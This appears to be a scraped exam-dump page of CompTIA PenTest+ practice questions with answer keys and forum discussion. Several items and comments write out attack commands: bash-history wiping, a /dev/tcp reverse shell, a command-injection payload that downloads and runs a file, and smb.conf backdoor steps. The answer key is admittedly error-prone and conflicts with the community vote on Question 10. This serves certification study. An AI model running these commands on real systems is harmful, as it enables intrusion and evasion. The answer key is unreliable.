PT0-002 Answers PDF

Chat with Document Quiz & Flashcards

Document Details

Tags

penetration testing cybersecurity information security compliance

Related

Summary

This document contains practice questions and answers related to penetration testing, specifically focusing on Linux file permissions and covering tracks during penetration tests. It includes examples of commands and their use. The questions and answers are suitable for self-study.

Full Transcript

 - Expert Verified, Online, Free.  Custom View Settings  Topic 1 - Single Topic Question #1...

 - Expert Verified, Online, Free.  Custom View Settings  Topic 1 - Single Topic Question #1 Topic 1 Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? A. chmod u+x script.sh B. chmod u+e script.sh C. chmod o+e script.sh D. chmod o+x script.sh Correct Answer: A Reference: https://newbedev.com/chmod-u-x-versus-chmod-x Community vote distribution A (100%)   RRabbit Highly Voted  1 year, 8 months ago It's important to note that permissions on Linux are divided into three categories: owner, group, and others. The "u" in the argument refers to the owner of the file, "g" refers to the group and "o" refers to others. Also, the file permissions are divided into three types: read, write and execute. "r" refers to read permission, "w" refers to write permission and "x" refers to execute permission. So, this command allows the owner of the file "script.sh" to execute the file. upvoted 16 times   outnumber_gargle024 Highly Voted  3 months, 3 weeks ago Passed yesterday - this dump is still good. Make sure you read the descriptions because the selected answers are often wrong. Read through all of the descriptions - many of the group answers are chat-GPT 3.5 and are also incredibly wrong the right answers to these questions are in the discussions and people are linking sources - great for studying. upvoted 5 times   Pass4sureclubs Most Recent  1 week, 4 days ago Selected Answer: A valid exam Question answers upvoted 2 times   MeisAdriano 1 month, 2 weeks ago  Selected Answer: A obviously chmod u+x script.sh upvoted 1 times   shezzu 2 months ago anyone recently passed this exam? is this dump still relevant? are the pbq's same? upvoted 1 times   Ottris 1 month, 4 weeks ago I did. I agree with outnumber_gargle024: this dump is still good, but the answers selected here are often wrong. For a good result, you should check the answers from the CompTIA book. Also, during the CompTIA course in class, we figured that sometimes CompTIA itself doesn't select an optimal solution. In this test, you must choose the correct one according to CompTIA, not always the most optimal answer. upvoted 1 times   Rocky_sy 3 months, 1 week ago none sense question. why would owner needs the pentester to give them permission ? it makes no sense. the owner already have the permission upvoted 2 times   aa9ee6c 3 months, 2 weeks ago just on the 52 questions -- when I took the exam there were 65 questions and 5 of them were the hardest pbds ive seen. ive taken 4 other comptia exam and none of them had as few as the pentest. upvoted 1 times   outnumber_gargle024 3 months, 3 weeks ago Testing within 48 hours - will update. upvoted 1 times   outnumber_gargle024 3 months, 3 weeks ago delete this comment fam sammy upvoted 2 times   KBrown2021 4 months, 3 weeks ago Passed my exam today by the skin of my teeth. There was 65 questions, 4 being PBQs. I made 774. Most of the questions I had wasn't on here. You will need other materials unless you know your sh*t. Pay special attention to the payloads lab and make sure you actually know what goes where and not just the order. Good Luck! upvoted 5 times   aa9ee6c 3 months, 2 weeks ago im here in the same situation KB but i had 5 pbqs. I just missed with a 731 and was coming here hoping this would cover the ~50% of material I hadnt seen in all my other study materials. I think we had the same payload question. upvoted 1 times   congnguyen92 7 months, 3 weeks ago A. chmod u+x script.sh upvoted 2 times   [Removed] 9 months, 3 weeks ago  Selected Answer: A A. chmod u+x script.sh upvoted 1 times   Alizade 10 months, 3 weeks ago Selected Answer: A A. chmod u+x script.sh upvoted 2 times   KeToopStudy 1 year, 1 month ago Selected Answer: A Chmod has three types of permissions: owner, group, and others. The "u" arguments stands for the owner/user and it is the correct answer. upvoted 1 times   bieecop 1 year, 2 months ago Selected Answer: A The chmod command is used to change the permissions of a file. In this case, the option u+x is used to grant execution permission to the file owner (u refers to the user/owner, and +x adds the execute permission). By running chmod u+x script.sh, the penetration tester is allowing the file owner to execute the shell script. upvoted 2 times  Question #2 Topic 1 A penetration tester gains access to a system and establishes persistence, and then run the following commands: Which of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history to further enumeration C. Covering tracks by clearing the Bash history D. Making decoy files on the system to confuse incident responders Correct Answer: C Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/ Community vote distribution C (86%) 14%   RRabbit Highly Voted  1 year, 8 months ago The Linux command "cat /dev/null > temp; touch -r.bash_history temp; mv temp.bash_history" is a combination of three commands that are executed sequentially: "cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file and making the file empty. "touch -r.bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp". "mv temp.bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" is no longer exist and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp". Overall, this command sequence creates an empty file called ".bash_history" with the same timestamp as an existing file with the same name and removes the original file "temp" upvoted 14 times   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: C C. Covering tracks by clearing the Bash history The tester is most likely performing an action of covering tracks by clearing the Bash history. The tester is redirecting the Bash history to /dev/null by using the command "cat /dev/null > temp" which will clear the content of the Bash history file. The tester is then using the command "touch -r.bash_history temp" to reset the timestamp of the temp file to match the timestamp of the Bash history file. Finally, the tester is moving the temp file to replace the Bash history file using  "mv temp.bash_history" command. This will clear the Bash history file and make it difficult for incident responders to track the tester's actions on the system. upvoted 6 times   MeisAdriano Most Recent  1 month, 2 weeks ago Selected Answer: C Covering tracks is the right answer upvoted 1 times   surfuganda 6 months, 1 week ago Selected Answer: C C. Covering tracks by clearing the Bash history Clear explanations already provided by others upvoted 1 times   [Removed] 9 months, 3 weeks ago Selected Answer: C C. Covering tracks by clearing the Bash history upvoted 1 times   P0wned 1 year, 3 months ago cat /dev/null > temp: This command creates an empty file named "temp" by redirecting the null device ("/dev/null") to the file. Essentially, it empties the contents of "temp" or creates an empty file if it doesn't exist. touch -r.bash_history temp: The "touch" command is used to update the timestamps of files. In this case, it updates the timestamp of "temp" to match the timestamp of ".bash_history". By using the "-r" option, the timestamp of ".bash_history" is copied to "temp". This command essentially sets the same modification time for "temp" as that of ".bash_history". mv temp.bash_history: The "mv" command is used to rename or move files. In this case, it renames "temp" to ".bash_history". As a result, the empty file created in the first command is now moved or renamed to replace the original ".bash_history" file. The end result is that ".bash_history" is emptied and replaced with an empty file. upvoted 1 times   cy_analyst 1 year, 7 months ago Selected Answer: C The cat /dev/null command outputs nothing (since /dev/null is a special file that discards all data written to it) and the > operator redirects the output of cat /dev/null to a new file called temp. This creates a new, empty file called temp in the current working directory, and any existing contents in temp (if there were any) are overwritten with the empty output of cat /dev/null. The purpose of creating an empty file like this is to replace the contents of the.bash_history file with an empty file, effectively erasing the command history. After creating the new temp file, the touch -r.bash_history temp command sets the modification time of the temp file to match that of the original.bash_history file, so that it appears as if the.bash_history file was never modified. Finally, the mv temp.bash_history command renames  the temp file to.bash_history, effectively replacing the original.bash_history file with an empty file that has the same name and modification time. upvoted 3 times   [Removed] 1 year, 7 months ago C is correct upvoted 2 times   mypixmania 1 year, 10 months ago The answer is C. Try recreate it on your system. upvoted 5 times   Manzer 1 year, 11 months ago Selected Answer: B The touch -r command is used to use the timestamp of another file. There is no deleting taking place. MV temp is to move to the temp. The tester is making a copy of the file. https://www.geeksforgeeks.org/touch-command-in-linux-with-examples/ upvoted 2 times  Question #3 Topic 1 A compliance-based penetration test is primarily concerned with: A. obtaining PII from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. D. obtaining specific information from the protected network. Correct Answer: C Community vote distribution C (91%) 9%   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: C C. determining the efficacy of a specific set of security standards. A compliance-based penetration test is primarily concerned with determining whether a specific set of security standards are being met by the organization. The main goal is to assess the organization's compliance with these standards and identify any vulnerabilities or weaknesses that could potentially put sensitive data at risk. This could include testing for compliance with regulations such as HIPAA, PCI-DSS, SOX, etc. It does not focus on obtaining personal identifiable information (PII) or specific information from the protected network, or bypassing protection on edge devices. upvoted 8 times   [Removed] Most Recent  9 months, 3 weeks ago Selected Answer: C This is exactly what a compliance does, checks to see how well the security standards are performing. In order to remain compliant, the controls/standards must hold up. upvoted 2 times   solutionz 1 year, 1 month ago Selected Answer: A A. obtaining PII from the protected network. A compliance-based penetration test focuses on assessing an organization's adherence to specific security standards and regulatory requirements. The primary concern of this type of test is to identify vulnerabilities and weaknesses in the organization's security controls and processes, especially those related to compliance with relevant regulations and standards. Option A, obtaining PII (Personally Identifiable Information), aligns with the goal of a compliance-based penetration test. The test aims to determine whether the organization adequately protects sensitive data, such as PII, in compliance with applicable data protection laws and regulations. While options B, C, and D might be relevant in some types of penetration tests, they are not the primary focus of a compliance-based test. The main objective is to assess compliance with specific security standards and regulatory requirements, rather than actively bypassing edge devices or obtaining specific information from the protected network. upvoted 1 times   Question #4 Topic 1 A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework? A. Understanding the tactics of a security intrusion can help disrupt them. B. Scripts that are part of the framework can be imported directly into SIEM tools. C. The methodology can be used to estimate the cost of an incident better. D. The framework is static and ensures stability of a security program over time. Correct Answer: A Reference: https://attack.mitre.org/ Community vote distribution A (100%)   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: A A. Understanding the tactics of a security intrusion can help disrupt them. The MITRE ATT&CK framework is a widely used method for describing the tactics, techniques, and procedures (TTPs) used by attackers in cyber security incidents. One of the main benefits of the framework is that it can help organizations understand the tactics used by attackers, and therefore, take steps to disrupt them or improve their defense against them. By understanding the tactics and techniques used by attackers, organizations can better identify and mitigate potential threats to their systems and data. Other benefits of the MITRE ATT&CK framework include that it can be used to help prioritize security efforts, assess the effectiveness of security controls, and measure an organization's readiness to defend against attacks. However, it should be noted that the framework is not a static one, and it's updated regularly to reflect new threats and techniques. upvoted 12 times   MeisAdriano Most Recent  1 month, 2 weeks ago Selected Answer: A I confirm A, because MITRE ATT&CK stands for "Adversarial Tactics, Techniques & Common Knowledge" so you use the methodology of your adversarial to disrupt them. upvoted 1 times   [Removed] 9 months, 3 weeks ago Selected Answer: A  A seems the most logical given the choices. upvoted 1 times   Meep123 11 months, 3 weeks ago I love you, Mr. RRabbit. upvoted 4 times  Question #5 Topic 1 Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities Correct Answer: AC Reference: https://www.synopsys.com/glossary/what-is-owasp-top-10.html Community vote distribution AC (100%)   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: AC A. The most critical risks of web applications C. The risks defined in order of importance The OWASP Top 10 is a list of the most critical web application security risks, as defined by the Open Web Application Security Project (OWASP). The list is updated every three years and it's designed to help organizations understand the most critical risks they should address in order to secure their web applications. The list is in order of importance, meaning that the risks at the top of the list are considered the most critical. The OWASP Top 10 is not a comprehensive list of all the risks of web applications, it's not a web-application security standard, it's not a risk-governance and compliance framework, and it's not a checklist of Apache vulnerabilities. It's a list of the most critical web  application security risks that should be addressed in order to secure web applications. upvoted 6 times   MeisAdriano Most Recent  1 month, 2 weeks ago Selected Answer: AC Obviously A and C upvoted 1 times   Dibonddo 1 year, 1 month ago The correct answers are: A. The most critical risks of web applications C. The risks defined in order of importance Explanation: The OWASP Top 10 is a well-known project by the Open Web Application Security Project (OWASP) that identifies and highlights the top ten most critical security risks for web applications. It provides a prioritized list of common vulnerabilities and weaknesses in web applications, helping developers and security professionals focus on addressing the most significant risks. Therefore, options A and C are the most accurate descriptions of the OWASP Top 10. upvoted 1 times  Question #6 Topic 1 A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback. B. Download.pl files and look for usernames and passwords. C. Edit the smb.conf file and upload it to the server. D. Download the smb.conf file and look at configurations. Correct Answer: C Community vote distribution C (49%) A (49%)   Neolot Highly Voted  1 year, 11 months ago Selected Answer: A Answer is A because the SMB.conf file won't give you internal access to the system, it would only be effective for Remote File Inclusion (RFI) which has already been achieved. upvoted 12 times   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: C C. Edit the smb.conf file and upload it to the server. The URLs discovered by the penetration tester shows that the vulnerability allows an attacker to upload files to the path by using directory traversal. By editing the smb.conf file (smb is short for Server Message Block, a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers) and uploading it to the server, an attacker can modify the configurations of the SMB service and potentially gain internal access to the affected machine. Option A is not the best method because it would only allow the attacker to remotely callback and it doesn't provide internal access. Option B is not the best method because the files are scripts and they are unlikely to contain usernames and passwords. Option D is not the best method because it would only allow the attacker to see the configurations of the SMB service, it doesn't provide internal access. upvoted 7 times   Rube210 Most Recent  1 week, 1 day ago Selected Answer: D smb.conf file: This file is crucial for managing Samba configurations, including access control, authentication, and file sharing. Downloading and analyzing it can reveal misconfigurations that could be exploited, making it a high-value target for attackers. upvoted 1 times   fuzzyguzzy 3 weeks, 4 days ago Selected Answer: A  A. Key phrase being "gain internal access". C would grant access to credentials and be able to change credentials, but if this would only be helpful with internal access. upvoted 2 times   MeisAdriano 1 month, 2 weeks ago Selected Answer: A not C: smb.conf it is in use by the daemon so you can’t overwrite it and you can’t upload in specific path. If you ignore you can’t overwrite it (or overwrite it and wait maybe a month when the service will be rebooted) and upload it in the specific canonical path, you could upload smb.conf in the canonical path, you could allow guest users to a specific directory… but too many limitations. Not D: To download smb.conf could be useful in information gathering but not in a specific attack for gain the access Not B: no one of the listed files seems contain usernames and passwords It is A: because I can change an existing file including a shell, a RAT, an exploit, to gain access of the machine and with discovery traversal I can execute this file. upvoted 1 times   Etc_Shadow28000 2 months, 2 weeks ago Selected Answer: A The BEST method for an attacker to gain internal access to the affected machine, given the vulnerability that allows path traversal and the files discovered, would be: A. Edit the discovered file with one line of code for remote callback. By editing one of the `.pl` (Perl) script files to include a remote callback, the attacker can execute arbitrary code on the server. This can provide the attacker with a foothold into the internal network, from which further attacks can be launched. upvoted 1 times   solutionz 1 year, 1 month ago Selected Answer: C The question is presenting a scenario in which a vulnerability has been discovered that allows for directory traversal, and various files have been discovered as a result of this vulnerability. Among the files listed, one stands out as particularly interesting from a penetration testing perspective: the smb.conf file. The smb.conf file is used to configure Samba, a service that provides file and print services to SMB/CIFS clients. By either editing or examining this file, an attacker could potentially gain more information or access to the system. Among the options presented, option C, "Edit the smb.conf file and upload it to the server," would provide the best method for an attacker to potentially gain internal access to the affected machine. By modifying the smb.conf file, an attacker might be able to alter how Samba behaves, possibly opening up more vulnerabilities or providing direct access to internal resources. So the correct answer to this question would be: C. Edit the smb.conf file and upload it to the server. upvoted 1 times   lifehacker0777 1 year, 5 months ago Selected Answer: A  Option A (edit the discovered file with one line of code for remote callback) may allow the tester to execute arbitrary code on the server if successful. However, this option may not provide long-term access to the machine and may be detected and blocked by security controls. Option C (edit the smb.conf file and upload it to the server) may allow the tester to modify the configuration of the machine to gain access. This option may be more effective in gaining long-term access and may be less likely to be detected by security controls. upvoted 1 times   cy_analyst 1 year, 5 months ago Selected Answer: C To carry out this attack, an attacker could follow these general steps: Use the vulnerability to traverse to the directory where the smb.conf file is located, which has been discovered in the given scenario. Download a copy of the smb.conf file to the attacker's machine. Modify the smb.conf file to include a backdoor user account, which will allow the attacker to remotely log into the system. Upload the modified smb.conf file back to the server, replacing the original file. Restart the Samba service to apply the changes. Use the backdoor user account to remotely log into the affected machine and gain internal access. upvoted 3 times   KingIT_ENG 1 year, 6 months ago C is the correct answer upvoted 1 times   KingIT_ENG 1 year, 6 months ago D is correct upvoted 1 times   [Removed] 1 year, 6 months ago C answer is correct upvoted 2 times   kgboi 1 year, 6 months ago Selected Answer: C Answer is C. upvoted 3 times   nickwen007 1 year, 6 months ago The smb.conf file is a configuration file used by the Samba software packages. It is used to configure settings related to network access and sharing, and it is located in the folder "/etc/samba". Samba is a suite of open source software that allows Windows, Linux, and Mac systems to communicate and share files with each other. It uses the SMB protocol and is commonly used to access file shares on a network. upvoted 3 times   The_F00L 1 year, 7 months ago Selected Answer: C I had initially answered C. Option A just enables remote callback, not internal access, whereas misconfigured SMB can totally be used to get into a system. Because the ratio on this question seemed wrong I also asked ChatGPT to verify my suspicion: "editing the smb.conf file and uploading it to the server, is the BEST method to help an attacker  gain internal access to the affected machine, as it allows the attacker to modify the server's configuration and potentially gain access to sensitive information or execute arbitrary code. The other options are not as effective, as downloading or editing the discovered.pl files may not lead to a significant security breach" Which is pretty much what I thought, so yeah. It's C upvoted 3 times   [Removed] 1 year, 7 months ago answer C is correct 100% upvoted 3 times  Question #7 Topic 1 A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the client's employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC Correct Answer: A Community vote distribution A (66%) B (34%)   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: A A. Whether sensitive client data is publicly accessible When assessing the security of hosted data in a cloud environment, the first thing that should be verified is whether sensitive client data is publicly accessible. This includes checking for any misconfigurations or vulnerabilities that could allow an unauthorized person to access the data. This could be accomplished by performing web application scans, network scans, and manual testing to check for any vulnerabilities that could allow for data exfiltration or unauthorized access. It's also important to check whether the connection between the cloud and the client is secure, whether the client's employees are trained properly to use the platform, and whether the cloud applications were developed using a secure SDLC, but verifying whether sensitive client data is publicly accessible should be the primary focus. upvoted 9 times   Etc_Shadow28000 Most Recent  2 months, 2 weeks ago Selected Answer: A The tester should verify FIRST: A. Whether sensitive client data is publicly accessible Ensuring that sensitive client data is not publicly accessible is the most immediate and critical check. If such data is exposed, it represents a significant risk to the company and its clients. This verification will help identify any obvious and severe vulnerabilities that could be exploited by attackers. upvoted 1 times   outnumber_gargle024 3 months, 3 weeks ago Selected Answer: B bravooooooooo upvoted 1 times   j904 5 months ago Selected Answer: B B. makes the most sense in a cloud scenario upvoted 1 times   surfuganda 6 months ago Selected Answer: B  Too much groupthink in these forums. Do some research, and use some tools. Get practical experience, and stop copy/pasting ChatGPT (It's just not that reliable). MY OPINION (sure, I could be wrong): The COMPANY is going to scan the CSP. The FIRST thing to do is [B]. Because if the COMPANY's connection is unsecured and intercepted, the intercepting party may have live access to the vulnerability results, and can attack before the scan is complete or before vulnerability mitigations are implemented (because mitigations can take time to implement). NOT DOING SO: creates a situation where the COMPANY introduces greater risk. After [B] is implemented, the vulnerability scan may inform whether [A] is a concern. upvoted 2 times   J0hnn13 10 months ago Selected Answer: B Ensuring the security of the connection between the client and the cloud is a fundamental aspect of cloud security. This includes assessing the encryption protocols, data in transit protection, and the overall security of the network connection. upvoted 3 times   [Removed] 10 months, 1 week ago Selected Answer: B When assessing the security of hosted data in a cloud environment, one of the first things to verify is the security of the connection between the cloud and the client. Therefore, the correct answer is: B. Whether the connection between the cloud and the client is secure upvoted 3 times   Mr_BuCk3th34D 1 year, 9 months ago B should be the first thing you do when assessing a cloud environment. Before anything else, you need to make sure that the connection between you (as a customer) and the cloud (as the provider), is secure, if not, there's no guarantee of the confidentiality and integrity of the information later, you can already assume that data might be exposed, eliminating alternative A as the answer. upvoted 2 times   bieecop 1 year, 9 months ago Selected Answer: A A That's correct. upvoted 3 times   ma3ks 1 year, 10 months ago Selected Answer: A should be a upvoted 3 times   lordguck 1 year, 10 months ago A: as not all cloud services require a client (B) upvoted 2 times   dcyberguy 1 year, 10 months ago Selected Answer: A I’ll go with A, since the company is conducting “Security in the Cloud”. Whether it’s data is publicly exposed is paramount upvoted 3 times    petercorn 1 year, 11 months ago Selected Answer: A Answer is A as question is asking 'data' upvoted 4 times   Neolot 1 year, 11 months ago Selected Answer: B i think B is the correct answer. upvoted 2 times  Question #8 Topic 1 A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit D. wget 10.10.51.50:9891/exploit Correct Answer: D Community vote distribution D (100%)   Neolot Highly Voted  1 year, 11 months ago Selected Answer: D The answer is correct. https://www.redhat.com/sysadmin/simple-http-server upvoted 7 times   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: D D. wget 10.10.51.50:9891/exploit The command "python -m SimpleHTTPServer 9891" starts a simple HTTP server on the machine it's executed on, on port 9891. This means that the file "exploit" would be served on the IP address of the machine on port 9891. To download the file "exploit" from the HTTP server that was started, the command "wget 10.10.51.50:9891/exploit" can be used. This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted and download the file. Option A doesn't work because the command "nc" (netcat) is a tool that can be used to read and write data across a network, it's not used to download files. Option B and C are not valid commands that can be used to download files from a web server. upvoted 6 times   MeisAdriano Most Recent  1 month, 2 weeks ago Selected Answer: D I think this question is malformed, but ok. The meaning of the question is: I start a webserver on VM1 and I want to grab a file like "exploted_password.txt" from the webserver(VM1) to my machine. That's why the perfect answer is D wget (or curl). B. "\\10.10.51.50" it's a not valid path to download files from an HTTP Server, here is a windows shared directory path. C. Good to create an inverse shell, but not valid to download files from an HTTP Server A. tricky answer... Not good for a lot of reasons: + this command is sending "exploited_password.txt" TO the webserver, and not getting it FROM the webserver  + netcat is not properly used to send file on a webserver, you could but in different way like on my machine: I execute a netcat for waiting a file on VM1: I execute a netcat to send a file. But that means I don't need to open a webserver. upvoted 1 times   cy_analyst 1 year, 5 months ago Selected Answer: D The command "python -m SimpleHTTPServer 9891" starts a web server on the staging server, listening on port 9891. This allows clients to download files from the server using HTTP. upvoted 1 times   nickwen007 1 year, 6 months ago The command "bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit" redirects a Bash shell to the network address 10.10.51.50 on port 9891. This allows you to send and receive data over the network and can be used to exploit vulnerable services. upvoted 2 times   nickwen007 1 year, 6 months ago The command "python -m SimpleHTTPServer 9891" starts a web server using the Python SimpleHTTPServer module. It binds the web server to port 9891, making it accessible through localhost on your computer. The server can be accessed from other computers by using the IP address of your computer along with the port number. upvoted 2 times   The_F00L 1 year, 7 months ago Selected Answer: D The answer is [D] Just try running it. [A] could also work with a bit of tweaking: echo "GET /exploit HTTP/1.1" | nc 10.10.51.50 9891 upvoted 3 times   dcyberguy 1 year, 10 months ago Answer D is a no-brainer upvoted 3 times  Question #9 Topic 1 A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement? A. grep -v apache ~/bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM ‫ג‬€apache‫ג‬€ /F Correct Answer: B Community vote distribution B (94%) 6%   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: B B. rm -rf /tmp/apache From the code snippet it appears that the penetration tester has used a POST exploit to gain access to a system and executed a command that downloads a file named "apache" from the IP address 10.10.0.1, and then it runs it. The command also changes the permissions of the file to 777 which means it's giving full permissions to all users. After the engagement, the penetration tester should clean up the system and return it to its original state. One of the first steps should be to remove the "apache" file from the system using the command "rm -rf /tmp/apache" to remove the file and the folder recursively. Option A is not recommended because it's removing the apache line from the bash history, but it doesn't remove the file. Option C is not recommended because it's changing the permissions of the file, but it doesn't remove the file. Option D is not recommended because it's killing the process, but it doesn't remove the file. upvoted 8 times   petercorn Highly Voted  1 year, 11 months ago Selected Answer: B B the correct answer, answer C is wrong, why need to change the permission as there is not using anymore after the post-engagement? upvoted 6 times   Mr_BuCk3th34D 1 year, 9 months ago That's right, this is to cover the tracks/logs after a successful break in. upvoted 2 times   MeisAdriano Most Recent  1 month, 2 weeks ago Selected Answer: B Code Explaination: an HTTP POST method will be used to send data to the server. The url /cgi-bin/index.cgi?action=login&Path=... indicates that the exploit is trying to access to an  CGI script for the login action and Path variable contains a lot of concatenated commands! /bin/sh$(system.IFS())-c$(system.IFS())'cd$(system.IFS())/tmp;: opens a /bin/sh shell and it changes the current directory into /tmp wget$(system.IFS())http://10.10.0.1/apache; it uses wget to download the file "apache" from an url. chmod${system.IFS()}777${system.IFS()}apache;:./apache'%0A%27&loginUser=a&Pwd=a it executes the downloaded "apache" file. HTTP/1.1 indicates de version of the HTTP protocol to use. upvoted 1 times   MeisAdriano 1 month, 2 weeks ago system.IFS() is an Internal Field Separator and this variable defines delimitators used by the system to separate words and token including generally spaces, tabs and new lines. In this situation it allows to concatenates commands. upvoted 1 times   MeisAdriano 1 month, 2 weeks ago not A. grep -v apache ~/bash_history > ~/.bash_history because you are removing all commands with text "apache" in the bash_history, good after an attack but too extreme and non-surgical/non-precise, indiscriminate. (grep -v shows all rows except the matched word, so then you replace the file with the "file without the word you find") not C. chmod 600 /tmp/apache The exploit code already change permission into 777, why you have to change in less? And it doesn't remove the apache file, the best action after a post-engagement. not D. taskkill /IM ‫ג‬€apache‫ג‬€ /F windows command to terminate a process. The question implicitally specifies linus as operating system, and also all other answer are on linux too.  Good answer B. rm -rf /tmp/apache upvoted 1 times   jade290 1 year, 3 months ago Why would it not be A. grep -v apache ~/bash_history > ~/.bash_history? This command will remove all lines from the ~/bash_history file that contain the word "apache". This covers tracks. upvoted 2 times   KeToopStudy 9 months, 3 weeks ago Because if you understand the snippet of code it shows that the command injection is making the victim server to download an executable into /tmp directory so it is clear that post exploitation you have to delete it. Clear answe is b upvoted 1 times   cy_analyst 1 year, 5 months ago Selected Answer: B The snippet of code appears to be a command injection exploit that uses the web application's login form to execute arbitrary commands on the server. The code downloads an executable named "apache" from a remote server and runs it with root privileges. upvoted 2 times   The_F00L 1 year, 7 months ago I totally read this as "Post exploitation" at first rather than "Post Engagement" That makes a bit of a difference LOL. B is going to be it, so you can remove installed tools from the tested device upvoted 5 times   ftlfrm 1 year, 5 months ago I did the exact same thing haha. upvoted 1 times   lordguck 1 year, 9 months ago I would do B, as the pen tester was the person who uploaded the file and knows it's content. If I found such a file on a system, C: would be an option to consider. upvoted 2 times   Neolot 1 year, 11 months ago Selected Answer: C The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600. upvoted 1 times  Question #10 Topic 1 Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe typecasting operations Correct Answer: C Community vote distribution D (100%)   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: D D. Code context for instances of unsafe typecasting operations A static application-security test is a method of evaluating the security of an application's source code without executing it. The final report of such a test should be written for the intended audience, in this case, it's a team of application developers. The most important information that should be included in the final report is the details of the vulnerabilities found, and how to fix them. This includes providing the code context for instances of unsafe typecasting operations, that is, providing the specific lines of code where the vulnerabilities were found, and describing the specific issue that needs to be addressed. An executive summary of the penetration-testing methods used, bill of materials including supplies, subcontracts, and costs incurred during assessment, and quantitative impact assessments given a successful software compromise are important information, but they are not as relevant as providing the code context and specific recommendations on how to fix the vulnerabilities found. upvoted 9 times   ryanzou Highly Voted  1 year, 11 months ago Selected Answer: D D for sure upvoted 5 times   Etc_Shadow28000 Most Recent  2 months, 2 weeks ago Selected Answer: D The most important element to include in the final report of a static application-security test intended for a team of application developers is: D. Code context for instances of unsafe typecasting operations Explanation: D. Code context for instances of unsafe typecasting operations: Developers need actionable insights to understand and remediate vulnerabilities. Including code context for instances of unsafe typecasting operations will provide them with specific examples  and locations within the codebase where issues occur. This information is crucial for developers to quickly identify, understand, and fix the vulnerabilities in their application. upvoted 1 times   solutionz 1 year, 1 month ago Selected Answer: D In the context of a static application-security test, and with the report intended for a team of application developers, the content should focus on details that are relevant to the development team's understanding of the security issues found in the code. Among the options, the one that is most directly relevant to developers would be the details about specific code-level issues. Option D, "Code context for instances of unsafe typecasting operations," provides specific, actionable information that developers can use to understand and fix the problems in the code. The details about the specific code problems, such as unsafe typecasting operations, would enable the developers to directly address the vulnerabilities discovered in the static analysis. So the correct answer to this question would be: D. Code context for instances of unsafe typecasting operations. upvoted 1 times   nickwen007 1 year, 6 months ago the code context for instances of unsafe typecasting operations. This will help the developers to understand the potential security risks and enable them to make the necessary changes to their code. upvoted 3 times   lordguck 1 year, 9 months ago D: C+D is intersting for management and risk assessment. A for IT security and network personel. upvoted 1 times   lordguck 1 year, 9 months ago Sorry typo not D-> B of course upvoted 1 times   Neolot 1 year, 11 months ago Selected Answer: D D is the answer, no doubt upvoted 5 times   pi123 1 year, 11 months ago Selected Answer: D I think Devs are interested in code analysis. upvoted 3 times   Chemical2007 1 year, 11 months ago I believe the answer should be D, developers would be interested in knowing the wrong code instances used upvoted 3 times  Question #11 Topic 1 SIMULATION - You are a penetration tester reviewing a client's website through a web browser. INSTRUCTIONS - Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.   Correct Answer: See explanation below. Step 1: Generate Certificate Signing Request Step 2: Submit CSR to the CA - Step 3: Remove certificate from the server Step 4: Install re-issued certificate on the server   [Removed] Highly Voted  9 months, 3 weeks ago This is a 3 part PBQ: You are a penetration tester reviewing a client's website through a web browser. Part 1. #remediatecertificates Step 1 - Generate a Certificate Signing Request Step 2 - Submit CSR to the CA Step 3 - Install re-issued certificate on the server Step 4 - Remove Certificate from Server Part. 2 #remediatecookies HTTP | SECURE | SameSite is are the fields. Below are the answers | ASP.NET_SessionID | False | True | True | | _utma | False | False | False | | _utmb | False | False | False | | _utmc | False | False | False | | _utmt | False | False | False | | _utmv | False | False | False | | _utmz | False | False | False 